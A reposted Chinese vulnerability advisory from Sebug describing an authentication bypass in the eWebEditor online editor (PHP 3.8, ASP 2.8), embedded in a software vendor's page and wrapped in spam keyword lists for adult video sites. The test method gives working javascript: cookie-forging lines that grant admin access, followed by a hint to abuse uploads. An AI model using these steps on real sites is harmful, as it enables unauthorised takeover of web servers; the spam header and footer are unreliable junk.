91网首页-91网页版-91网在线观看-91网站免费观看-91网站永久视频-91网站在线播放

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

ewebeditor php&asp版本后臺跳過認證漏洞-適用于asp2.8 PHP3.8

admin
2010年8月13日 10:20 本文熱度 5239

SSV ID:19010

SEBUG-Appdir:eWebEditor

發布時間:2009-12-12

影響版本:

php v3.8
asp v2.8

漏洞描述:

eWebEditor是一個所見即所得的在線編輯器。顧名思義,就是能在網絡上使用所見即所得的編輯方式進行編輯圖文并茂的文章、新聞、討論貼、通告、記事等多種文字處理應用。
../ewebeditor/admin/config.php文件
用戶認證方式存在嚴重的安全漏洞,可以直接跳過認證獲取到管理員權限。


測試方法:

[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
首先當然要找到登陸后臺,默認是../eWebEditor/admin/login.php,進入后臺后隨便輸入一個用戶和密碼,當然會提示出錯了.
這時候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回車,清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經過驗證才能瀏覽的文件如../ewebeditor/admin /default.php
哈哈,直接進去了,利用和asp一樣,新增樣式修改上傳,就ok了

SEBUG安全建議:

暫無
請參考官方補丁

// sebug.net [2010-01-27]

該文章在 2010/8/13 10:20:56 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 国产精品自 | 日本一区二区三 | 九九热99最新地址 | 91大神视频 | 91精品国产区| 日本亚洲欧美风情 | 欧洲综合国产在线 | 欧美三区日韩一 | 国产主播福利下一页 | 日韩午夜三级 | 国产精品极品 | 91精品午夜福利 | 91香蕉网站在线 | 91精品国产现 | 欧美日皮| 国产成本人片免费v | 日本欧美黑白配在线 | 精品欧洲在线观看 | 国产激动情五月天 | 欧美三级一级在 | 国产高清精品 | 日本亚洲欧美在线视 | 丝袜国产精品亚洲 | 国产系列在线观看 | 韩国伦理中文字幕 | 另类猎奇专区 | 国产精品一区二区 | 国产超污精 | 区不卡视频 | 欧美日韩一级 | 日韩免费精品专区 | 日韩中文字幕网站 | 日本高清视频网址 | 国产免费a视频 | 激情文学小说区另 | 91po国| 拍拍拍精品网站 | 91精选国产大片 | 91精品国产调 | 91啦丨露脸丨熟女 | 日本免费一区二 |